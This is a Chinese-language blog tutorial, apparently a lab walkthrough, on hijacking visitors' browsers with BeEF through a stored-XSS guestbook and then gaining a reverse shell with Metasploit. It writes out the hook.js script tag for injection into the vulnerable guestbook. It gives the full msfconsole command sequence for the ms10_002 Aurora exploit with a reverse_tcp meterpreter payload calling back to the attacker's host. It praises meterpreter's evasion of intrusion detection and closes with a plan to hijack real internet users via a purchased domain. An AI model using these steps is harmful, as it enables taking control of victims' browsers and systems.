使用Beef劫持客户端浏览器并进一步使用Beef+msf拿客户端shell
环境:
1.Kali(使用beef生成恶意代码,IP:192.168.114.140)
2.一台web服务器(留言板存在XSS跨站脚本漏洞,IP:192.168.114.204)
3. 客户端(用于访问web服务器,IP:192.168.114.130)
步骤:
1. Kali使用beef生成恶意代码
2. 将恶意代码写入192.168.114.204网站留言板
3. 只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持
目的:
控制目标主机的浏览器,通过目标主机浏览器获得该主机的详细信息,并进一步扫描内网,配合metasploit进行内网渗透
以下为具体操作:
一、搭建服务器
首先我在window server 2003上搭建IIS服务器,在站长之家找了一个存在XSS漏洞的留言板源码(我心依然留言板),发布到IIS服务器上。
用WVS扫了一下,确实存在XSS漏洞:
二、Kali中Beef的安装和使用:
启动成功后:
浏览器输入:http://127.0.0.1:3000/ui/panel,Usename与Password均为beef:
三、挂马
将如上图所示的Hook URL写入web服务器存在XSS漏洞的留言板中<scriptsrc="http://192.168.114.140:3000/hook.js"></script>
如果留言被管理员审核通过,你的留言能在留言板显示出来。当客户端访问服务器的留言板后,你可以在Beef控制端查看目标主机,如果出现下图所示内网,表示客户端浏览器已经被成功劫持
在Current Browser项选择Browser,点击Hooked Domain选择Redirect Browser,在右边的Redirect URL中输入网址,即可控制浏览器跳转到目标网址
Beef+msf拿客户端shell(XP+IE6)
一、运行metasploit
Kali收藏栏找到metasploit framework
也可以新建终端输入:msfconsole,启动成功后:
输入以下命令:
1.search ms10_002(寻找ms10_002漏洞)
2.useexploit/windows/browser/ms10_002_aurora(使用ms10_002极光漏洞)
3.set payloadwindows/meterpreter/reverse_tcp(设置TCP回连攻击载荷)
4.show options(查看漏洞利用工具选项)
5.set srvhost 192.168.114.140(配置客户端访问的目标地址,这里是Kali本机的IP地址)
6.set srvport 7777(访问的端口号)
7.set uripath /(网站根路径)
8.set lhost 192.168.114.140(设置本地接收地址)
9.set lport 4444(端口号)
10.show options (查看是否更改过来)
11.exploit(执行利用,出现如下所示表示执行成功)
利用Beef生成的恶意代码植入到存在XSS漏洞的web服务器(12.168.114.204),客户端(192.168.114.130)浏览植入恶意代码的网页,造成客户端浏览器被劫持。当前客户端使用的环境为windows
XP+IE6,我们使用metasploit
framework工具针对IE6的ms10_002极光漏洞进行利用,控制客户端被劫持的浏览器访问192.168.114.140:7777,触发该漏洞,通过漏洞拿到客户端的权限shell,回连192.168.114.140:4444,从而达到控制客户端系统的目的。
由于笔者的XP+IE6环境没有搭好,以下用的firefox浏览器演示命令执行,跳转之后的效果:
如何查看这个shell,我们在Kali中的metasploit终端按下回车。输入sessions –i(由于用的firefox浏览器,所以没有成功获取session)
我在网上找了张图,当成功利用,显示如下:
根据sessions的Id,输入sessions -i 1,得到meterpreter:
meterpreter是metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个meterpretershell的链接。meterpretershell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS[基于主机的入侵检测系统]很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。
输入shell就可以拿到目标主机的一个cmd
然后就可以做任何想做的事比如net user 创建用户等
二、漏洞发布网站:
想要使用metasploit,当然要配合漏洞进行利用,以下为漏洞发布网站,可以经常去看看:
https://www.exploit-db.com/
三、Beef如何在外网中应用思路
仅个人的一些想法,如果不对请指正:利用本机为Web服务器,购买域名,并将域名解析至本机IP地址,在本机的网站上写入恶意代码。当外网客户端通过域名访问我本机搭建的网站,导致浏览器被劫持。
使用Beef劫持客户端浏览器并进一步使用Beef+msf拿客户端shell的更多相关文章
- 利用Beef劫持客户端浏览器
利用Beef劫持客户端浏览器 环境: 1.Kali(使用beef生成恶意代码,IP:192.168.114.140) 2.一台web服务器(留言板存在XSS跨站脚本漏洞,IP:192.168.11 ...
- asp.net获取客户端浏览器及主机信息
在线预览效果:http://tool.hovertree.com/info/client/ 其中aspx页面的控件代码: <asp:ListBox runat="server" ...
- php获取客户端浏览器以及操作系统信息的方法
发布:sunday01 来源:net 阅读: 2 [大 中 小] 在较为智能的程序中,php可以获取客户端浏览器及操作系统信息,然后根据浏览器及系统类型,加载不同的页面,以提供更加个性化的 ...
- 客户端浏览器判断(ios .android)
在开发工程中,我们可能需要判断客户端浏览器的版本而作相应的处理:通常做法是通过浏览器的userAgent去判断浏览器版本,故在此总结下,方便以后使用. <script type="te ...
- WPF 客户端浏览器 添加Loading加载进度
在windows开发界面时,使用浏览器来请求和显示网页内容,是比较常见的. 但是在请求网页内容时,因网速或者前端功能复杂加载较慢,亦或者加载时遇到各种问题,如空白/黑屏/加载不完整/证书问题等. 因此 ...
- 获取ip,获取客户端浏览器,获取客户端访问操作系统,获取客户端访问设备
/** * 获取ip */ public static function getIp() { if (getenv('HTTP_CLIENT_IP')) { $ip = getenv('HTTP_CL ...
- html利用j获取局域网内的本机IP(根据客户端浏览器的ip获取)
根据客户端浏览器的ip获取 <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type ...
- 利用form.submit提交表单导出文件到客户端浏览器, 提示下载!
本来是想利用ajax提交json数据到服务端, 让服务端生成一个excel文件并提示客户端浏览器下载的. 但是搞了很久发现ajax方式是无法触发浏览器弹出文件下载的. 网上很多的方案都是说利用form ...
- ios客户端浏览器样式加载失效问题
最近线上测试中出现一个奇怪的问题,ios客户端浏览器样式加载失效. 从表象来看,同样的css,安卓手机上可以正常展示,但是到ios手机上首次进入页面就不能正常显示 这时候,我们首先会考虑是不是ios设 ...
随机推荐
- stm32定时器频率采样的方式
频率采样方法通常采样定时器的计数方法,在stm32中,输入捕捉模式,PWM输入模式,都是可以测试外部信号频率采样的.1.输入捕捉模式需要频繁的进中断,这个方式不太好的.如果一定要用,那么就软件上处理一 ...
- html--前端JavaScript基本内容
一.JavaScript 变量 在 JavaScript 中创建变量通常称为"声明"变量. 使用 var 关键词来声明变量. 注意: 1.变量必须以字母开头 2.变量也能以 $ 和 ...
- ESA2GJK1DH1K微信小程序篇: 小程序连接MQTT简单的Demo
前言 这节让大家知道小程序是怎么连接的MQTT 其实,小程序就是网页实现MQTT 使用的是下面这个包 新建一个工程 一,把包放到util里面 二,编写连接函数 三,调用连接函数 订阅主题显示接收的消息 ...
- pcm音频的格式类型
[文章内容属于多方转载内容] PCM Parameters PCM audio is coded using a combination of various parameters. Resoluti ...
- 【Codeforces】B. Div Times Mod
B. Div Times Mod time limit per test 1 second memory limit per test 256 megabytes input standard inp ...
- SpringMVC之使用ResponseEntity
1.Post请求 一般情况下,在非必须的情况下,使用Jquery实现post请求,而后台返回一般都需要手动封装ResponseUtil,和使用@ResponseBody注解来实现返回.然而我们书上学到 ...
- python发展
python的创始人---吉多·范罗苏姆(Guido van Rossum)
- elasticsearch 常用命令 一直红色 重启不稳定 不停的宕机
persistent (重启后设置也会存在) or transient (整个集群重启后会消失的设置). 查看集群状态和每个indices状态.搜索到red的,没用就删除 GET /_cluster/ ...
- 关于MySQL 通用查询日志和慢查询日志分析(转)
MySQL中的日志包括:错误日志.二进制日志.通用查询日志.慢查询日志等等.这里主要介绍下比较常用的两个功能:通用查询日志和慢查询日志. 1)通用查询日志:记录建立的客户端连接和执行的语句. 2)慢查 ...
- Linux 就该这么学 CH09 使用ssh服务管理远程主机
1 .配置网络服务 1)配置网络参数 五种配置网络的方法:命令行,编译网络配置文件,nmtui(旧版ui界面),nm-connection-edit(新版ui),VM虚拟机右上角图标等. 这里配 ...